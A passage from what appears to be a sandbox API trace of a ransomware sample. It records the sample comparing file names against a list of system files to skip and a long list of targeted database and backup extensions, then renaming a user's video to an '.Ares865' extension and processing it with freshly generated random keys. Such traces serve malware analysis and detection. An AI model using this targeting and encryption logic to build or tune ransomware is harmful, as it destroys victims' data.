lpString2="fmp") returned 1 [0092.083] lstrlenW (lpString="fmp12") returned 5 [0092.083] lstrcmpiW (lpString1="7.mkv", lpString2="fmp12") returned -1 [0092.083] lstrlenW (lpString="fmpsl") returned 5 [0092.083] lstrcmpiW (lpString1="7.mkv", lpString2="fmpsl") returned -1 [0092.083] lstrlenW (lpString="fol") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fol") returned 1 [0092.083] lstrlenW (lpString="fp3") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fp3") returned 1 [0092.083] lstrlenW (lpString="fp4") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fp4") returned 1 [0092.083] lstrlenW (lpString="fp5") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fp5") returned 1 [0092.083] lstrlenW (lpString="fp7") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fp7") returned 1 [0092.083] lstrlenW (lpString="fpt") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="fpt") returned 1 [0092.083] lstrlenW (lpString="frm") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="frm") returned 1 [0092.083] lstrlenW (lpString="gdb") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0092.083] lstrlenW (lpString="gdb") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0092.083] lstrlenW (lpString="grdb") returned 4 [0092.083] lstrcmpiW (lpString1=".mkv", lpString2="grdb") returned -1 [0092.083] lstrlenW (lpString="gwi") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="gwi") returned 1 [0092.083] lstrlenW (lpString="hdb") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="hdb") returned 1 [0092.083] lstrlenW (lpString="his") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="his") returned 1 [0092.083] lstrlenW (lpString="ib") returned 2 [0092.083] lstrcmpiW (lpString1="kv", lpString2="ib") returned 1 [0092.083] lstrlenW (lpString="idb") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="idb") returned 1 [0092.083] lstrlenW (lpString="ihx") returned 3 [0092.083] lstrcmpiW (lpString1="mkv", lpString2="ihx") returned 1 [0092.083] lstrlenW (lpString="itdb") returned 4 [0092.084] lstrcmpiW (lpString1=".mkv", lpString2="itdb") returned -1 [0092.084] lstrlenW (lpString="itw") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="itw") returned 1 [0092.084] lstrlenW (lpString="jet") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="jet") returned 1 [0092.084] lstrlenW (lpString="jtx") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="jtx") returned 1 [0092.084] lstrlenW (lpString="kdb") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="kdb") returned 1 [0092.084] lstrlenW (lpString="kexi") returned 4 [0092.084] lstrcmpiW (lpString1=".mkv", lpString2="kexi") returned -1 [0092.084] lstrlenW (lpString="kexic") returned 5 [0092.084] lstrcmpiW (lpString1="7.mkv", lpString2="kexic") returned -1 [0092.084] lstrlenW (lpString="kexis") returned 5 [0092.084] lstrcmpiW (lpString1="7.mkv", lpString2="kexis") returned -1 [0092.084] lstrlenW (lpString="lgc") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="lgc") returned 1 [0092.084] lstrlenW (lpString="lwx") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="lwx") returned 1 [0092.084] lstrlenW (lpString="maf") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="maf") returned 1 [0092.084] lstrlenW (lpString="maq") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="maq") returned 1 [0092.084] lstrlenW (lpString="mar") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="mar") returned 1 [0092.084] lstrlenW (lpString="marshal") returned 7 [0092.084] lstrcmpiW (lpString1="BW7.mkv", lpString2="marshal") returned -1 [0092.084] lstrlenW (lpString="mas") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="mas") returned 1 [0092.084] lstrlenW (lpString="mav") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="mav") returned 1 [0092.084] lstrlenW (lpString="maw") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="maw") returned 1 [0092.084] lstrlenW (lpString="mdbhtml") returned 7 [0092.084] lstrcmpiW (lpString1="BW7.mkv", lpString2="mdbhtml") returned -1 [0092.084] lstrlenW (lpString="mdn") returned 3 [0092.084] lstrcmpiW (lpString1="mkv", lpString2="mdn") returned 1 [0092.084] lstrlenW (lpString="mdt") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mdt") returned 1 [0092.085] lstrlenW (lpString="mfd") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mfd") returned 1 [0092.085] lstrlenW (lpString="mpd") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mpd") returned -1 [0092.085] lstrlenW (lpString="mrg") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mrg") returned -1 [0092.085] lstrlenW (lpString="mud") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mud") returned -1 [0092.085] lstrlenW (lpString="mwb") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="mwb") returned -1 [0092.085] lstrlenW (lpString="myd") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="myd") returned -1 [0092.085] lstrlenW (lpString="ndf") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="ndf") returned -1 [0092.085] lstrlenW (lpString="nnt") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="nnt") returned -1 [0092.085] lstrlenW (lpString="nrmlib") returned 6 [0092.085] lstrcmpiW (lpString1="W7.mkv", lpString2="nrmlib") returned 1 [0092.085] lstrlenW (lpString="ns2") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="ns2") returned -1 [0092.085] lstrlenW (lpString="ns3") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="ns3") returned -1 [0092.085] lstrlenW (lpString="ns4") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="ns4") returned -1 [0092.085] lstrlenW (lpString="nsf") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="nsf") returned -1 [0092.085] lstrlenW (lpString="nv") returned 2 [0092.085] lstrcmpiW (lpString1="kv", lpString2="nv") returned -1 [0092.085] lstrlenW (lpString="nv2") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="nv2") returned -1 [0092.085] lstrlenW (lpString="nwdb") returned 4 [0092.085] lstrcmpiW (lpString1=".mkv", lpString2="nwdb") returned -1 [0092.085] lstrlenW (lpString="nyf") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="nyf") returned -1 [0092.085] lstrlenW (lpString="odb") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0092.085] lstrlenW (lpString="odb") returned 3 [0092.085] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0092.086] lstrlenW (lpString="oqy") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="oqy") returned -1 [0092.086] lstrlenW (lpString="ora") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="ora") returned -1 [0092.086] lstrlenW (lpString="orx") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="orx") returned -1 [0092.086] lstrlenW (lpString="owc") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="owc") returned -1 [0092.086] lstrlenW (lpString="p96") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="p96") returned -1 [0092.086] lstrlenW (lpString="p97") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="p97") returned -1 [0092.086] lstrlenW (lpString="pan") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="pan") returned -1 [0092.086] lstrlenW (lpString="pdb") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="pdb") returned -1 [0092.086] lstrlenW (lpString="pdm") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="pdm") returned -1 [0092.086] lstrlenW (lpString="pnz") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="pnz") returned -1 [0092.086] lstrlenW (lpString="qry") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="qry") returned -1 [0092.086] lstrlenW (lpString="qvd") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="qvd") returned -1 [0092.086] lstrlenW (lpString="rbf") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="rbf") returned -1 [0092.086] lstrlenW (lpString="rctd") returned 4 [0092.086] lstrcmpiW (lpString1=".mkv", lpString2="rctd") returned -1 [0092.086] lstrlenW (lpString="rod") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="rod") returned -1 [0092.086] lstrlenW (lpString="rodx") returned 4 [0092.086] lstrcmpiW (lpString1=".mkv", lpString2="rodx") returned -1 [0092.086] lstrlenW (lpString="rpd") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="rpd") returned -1 [0092.086] lstrlenW (lpString="rsd") returned 3 [0092.086] lstrcmpiW (lpString1="mkv", lpString2="rsd") returned -1 [0092.086] lstrlenW (lpString="sas7bdat") returned 8 [0092.086] lstrcmpiW (lpString1="LBW7.mkv", lpString2="sas7bdat") returned -1 [0092.087] lstrlenW (lpString="sbf") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="sbf") returned -1 [0092.087] lstrlenW (lpString="scx") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="scx") returned -1 [0092.087] lstrlenW (lpString="sdb") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="sdb") returned -1 [0092.087] lstrlenW (lpString="sdc") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="sdc") returned -1 [0092.087] lstrlenW (lpString="sdf") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="sdf") returned -1 [0092.087] lstrlenW (lpString="sis") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="sis") returned -1 [0092.087] lstrlenW (lpString="spq") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="spq") returned -1 [0092.087] lstrlenW (lpString="te") returned 2 [0092.087] lstrcmpiW (lpString1="kv", lpString2="te") returned -1 [0092.087] lstrlenW (lpString="teacher") returned 7 [0092.087] lstrcmpiW (lpString1="BW7.mkv", lpString2="teacher") returned -1 [0092.087] lstrlenW (lpString="tmd") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="tmd") returned -1 [0092.087] lstrlenW (lpString="tps") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="tps") returned -1 [0092.087] lstrlenW (lpString="trc") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0092.087] lstrlenW (lpString="trc") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0092.087] lstrlenW (lpString="trm") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="trm") returned -1 [0092.087] lstrlenW (lpString="udb") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="udb") returned -1 [0092.087] lstrlenW (lpString="udl") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="udl") returned -1 [0092.087] lstrlenW (lpString="usr") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="usr") returned -1 [0092.087] lstrlenW (lpString="v12") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="v12") returned -1 [0092.087] lstrlenW (lpString="vis") returned 3 [0092.087] lstrcmpiW (lpString1="mkv", lpString2="vis") returned -1 [0092.087] lstrlenW (lpString="vpd") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="vpd") returned -1 [0092.088] lstrlenW (lpString="vvv") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="vvv") returned -1 [0092.088] lstrlenW (lpString="wdb") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="wdb") returned -1 [0092.088] lstrlenW (lpString="wmdb") returned 4 [0092.088] lstrcmpiW (lpString1=".mkv", lpString2="wmdb") returned -1 [0092.088] lstrlenW (lpString="wrk") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="wrk") returned -1 [0092.088] lstrlenW (lpString="xdb") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="xdb") returned -1 [0092.088] lstrlenW (lpString="xld") returned 3 [0092.088] lstrcmpiW (lpString1="mkv", lpString2="xld") returned -1 [0092.088] lstrlenW (lpString="xmlff") returned 5 [0092.088] lstrcmpiW (lpString1="7.mkv", lpString2="xmlff") returned -1 [0092.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\pkjInOLBW7.mkv.Ares865") returned 101 [0092.088] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\pkjInOLBW7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\pkjinolbw7.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\pkjInOLBW7.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\pkjinolbw7.mkv.ares865"), dwFlags=0x1) returned 1 [0092.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\pkjInOLBW7.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\pkjinolbw7.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97747) returned 1 [0092.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.089] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.090] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.090] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.090] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x180e0, lpName=0x0) returned 0x15c [0092.090] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180e0) returned 0x190000 [0092.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.094] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.094] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.095] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.096] CloseHandle (hObject=0x15c) returned 1 [0092.096] CloseHandle (hObject=0x118) returned 1 [0092.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.100] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3acc40, ftCreationTime.dwHighDateTime=0x1d4d319, ftLastAccessTime.dwLowDateTime=0xc1a6c760, ftLastAccessTime.dwHighDateTime=0x1d4cea7, ftLastWriteTime.dwLowDateTime=0xc1a6c760, ftLastWriteTime.dwHighDateTime=0x1d4cea7, nFileSizeHigh=0x0, nFileSizeLow=0x121ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RgGkmB8mEK.swf", cAlternateFileName="RGGKMB~1.SWF")) returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="aoldtz.exe") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2=".") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="..") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="windows") returned -1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="bootmgr") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="temp") returned -1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="pagefile.sys") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="boot") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="ids.txt") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="ntuser.dat") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="perflogs") returned 1 [0092.100] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2="MSBuild") returned 1 [0092.100] lstrlenW (lpString="RgGkmB8mEK.swf") returned 14 [0092.100] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\pkjInOLBW7.mkv") returned 93 [0092.101] lstrcpyW (in: lpString1=0x2cce49e, lpString2="RgGkmB8mEK.swf" | out: lpString1="RgGkmB8mEK.swf") returned="RgGkmB8mEK.swf" [0092.101] lstrlenW (lpString="RgGkmB8mEK.swf") returned 14 [0092.101] lstrlenW (lpString="Ares865") returned 7 [0092.101] lstrcmpiW (lpString1="mEK.swf", lpString2="Ares865") returned 1 [0092.101] lstrlenW (lpString=".dll") returned 4 [0092.101] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2=".dll") returned 1 [0092.101] lstrlenW (lpString=".lnk") returned 4 [0092.101] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2=".lnk") returned 1 [0092.101] lstrlenW (lpString=".ini") returned 4 [0092.101] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2=".ini") returned 1 [0092.101] lstrlenW (lpString=".sys") returned 4 [0092.101] lstrcmpiW (lpString1="RgGkmB8mEK.swf", lpString2=".sys") returned 1 [0092.101] lstrlenW (lpString="RgGkmB8mEK.swf") returned 14 [0092.101] lstrlenW (lpString="bak") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="bak") returned 1 [0092.101] lstrlenW (lpString="ba_") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="ba_") returned 1 [0092.101] lstrlenW (lpString="dbb") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="dbb") returned 1 [0092.101] lstrlenW (lpString="vmdk") returned 4 [0092.101] lstrcmpiW (lpString1=".swf", lpString2="vmdk") returned -1 [0092.101] lstrlenW (lpString="rar") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="rar") returned 1 [0092.101] lstrlenW (lpString="zip") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="zip") returned -1 [0092.101] lstrlenW (lpString="tgz") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="tgz") returned -1 [0092.101] lstrlenW (lpString="vbox") returned 4 [0092.101] lstrcmpiW (lpString1=".swf", lpString2="vbox") returned -1 [0092.101] lstrlenW (lpString="vdi") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="vdi") returned -1 [0092.101] lstrlenW (lpString="vhd") returned 3 [0092.101] lstrcmpiW (lpString1="swf", lpString2="vhd") returned -1 [0092.101] lstrlenW (lpString="vhdx") returned 4 [0092.101] lstrcmpiW (lpString1=".swf", lpString2="vhdx") returned -1 [0092.101] lstrlenW (lpString="avhd") returned 4 [0092.101] lstrcmpiW (lpString1=".swf", lpString2="avhd") returned -1 [0092.101] lstrlenW (lpString="db") returned 2 [0092.101] lstrcmpiW (lpString1="wf", lpString2="db") returned 1 [0092.102] lstrlenW (lpString="db2") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="db2") returned 1 [0092.102] lstrlenW (lpString="db3") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="db3") returned 1 [0092.102] lstrlenW (lpString="dbf") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="dbf") returned 1 [0092.102] lstrlenW (lpString="mdf") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="mdf") returned 1 [0092.102] lstrlenW (lpString="mdb") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="mdb") returned 1 [0092.102] lstrlenW (lpString="sql") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="sql") returned 1 [0092.102] lstrlenW (lpString="sqlite") returned 6 [0092.102] lstrcmpiW (lpString1="EK.swf", lpString2="sqlite") returned -1 [0092.102] lstrlenW (lpString="sqlite3") returned 7 [0092.102] lstrcmpiW (lpString1="mEK.swf", lpString2="sqlite3") returned -1 [0092.102] lstrlenW (lpString="sqlitedb") returned 8 [0092.102] lstrcmpiW (lpString1="8mEK.swf", lpString2="sqlitedb") returned -1 [0092.102] lstrlenW (lpString="xml") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="xml") returned -1 [0092.102] lstrlenW (lpString="$er") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="$er") returned 1 [0092.102] lstrlenW (lpString="4dd") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="4dd") returned 1 [0092.102] lstrlenW (lpString="4dl") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="4dl") returned 1 [0092.102] lstrlenW (lpString="^^^") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="^^^") returned 1 [0092.102] lstrlenW (lpString="abs") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="abs") returned 1 [0092.102] lstrlenW (lpString="abx") returned 3 [0092.102] lstrcmpiW (lpString1="swf", lpString2="abx") returned 1 [0092.102] lstrlenW (lpString="accdb") returned 5 [0092.102] lstrcmpiW (lpString1="K.swf", lpString2="accdb") returned 1 [0092.102] lstrlenW (lpString="accdc") returned 5 [0092.102] lstrcmpiW (lpString1="K.swf", lpString2="accdc") returned 1 [0092.102] lstrlenW (lpString="accde") returned 5 [0092.102] lstrcmpiW (lpString1="K.swf", lpString2="accde") returned 1 [0092.103] lstrlenW (lpString="accdr") returned 5 [0092.103] lstrcmpiW (lpString1="K.swf", lpString2="accdr") returned 1 [0092.103] lstrlenW (lpString="accdt") returned 5 [0092.103] lstrcmpiW (lpString1="K.swf", lpString2="accdt") returned 1 [0092.103] lstrlenW (lpString="accdw") returned 5 [0092.103] lstrcmpiW (lpString1="K.swf", lpString2="accdw") returned 1 [0092.103] lstrlenW (lpString="accft") returned 5 [0092.103] lstrcmpiW (lpString1="K.swf", lpString2="accft") returned 1 [0092.103] lstrlenW (lpString="adb") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="adb") returned 1 [0092.103] lstrlenW (lpString="adb") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="adb") returned 1 [0092.103] lstrlenW (lpString="ade") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="ade") returned 1 [0092.103] lstrlenW (lpString="adf") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="adf") returned 1 [0092.103] lstrlenW (lpString="adn") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="adn") returned 1 [0092.103] lstrlenW (lpString="adp") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="adp") returned 1 [0092.103] lstrlenW (lpString="alf") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="alf") returned 1 [0092.103] lstrlenW (lpString="ask") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="ask") returned 1 [0092.103] lstrlenW (lpString="btr") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="btr") returned 1 [0092.103] lstrlenW (lpString="cat") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="cat") returned 1 [0092.103] lstrlenW (lpString="cdb") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="cdb") returned 1 [0092.103] lstrlenW (lpString="ckp") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="ckp") returned 1 [0092.103] lstrlenW (lpString="cma") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="cma") returned 1 [0092.103] lstrlenW (lpString="cpd") returned 3 [0092.103] lstrcmpiW (lpString1="swf", lpString2="cpd") returned 1 [0092.103] lstrlenW (lpString="dacpac") returned 6 [0092.103] lstrcmpiW (lpString1="EK.swf", lpString2="dacpac") returned 1 [0092.103] lstrlenW (lpString="dad") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dad") returned 1 [0092.104] lstrlenW (lpString="dadiagrams") returned 10 [0092.104] lstrcmpiW (lpString1="mB8mEK.swf", lpString2="dadiagrams") returned 1 [0092.104] lstrlenW (lpString="daschema") returned 8 [0092.104] lstrcmpiW (lpString1="8mEK.swf", lpString2="daschema") returned -1 [0092.104] lstrlenW (lpString="db-journal") returned 10 [0092.104] lstrcmpiW (lpString1="mB8mEK.swf", lpString2="db-journal") returned 1 [0092.104] lstrlenW (lpString="db-shm") returned 6 [0092.104] lstrcmpiW (lpString1="EK.swf", lpString2="db-shm") returned 1 [0092.104] lstrlenW (lpString="db-wal") returned 6 [0092.104] lstrcmpiW (lpString1="EK.swf", lpString2="db-wal") returned 1 [0092.104] lstrlenW (lpString="dbc") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dbc") returned 1 [0092.104] lstrlenW (lpString="dbs") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dbs") returned 1 [0092.104] lstrlenW (lpString="dbt") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dbt") returned 1 [0092.104] lstrlenW (lpString="dbv") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dbv") returned 1 [0092.104] lstrlenW (lpString="dbx") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dbx") returned 1 [0092.104] lstrlenW (lpString="dcb") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dcb") returned 1 [0092.104] lstrlenW (lpString="dct") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dct") returned 1 [0092.104] lstrlenW (lpString="dcx") returned 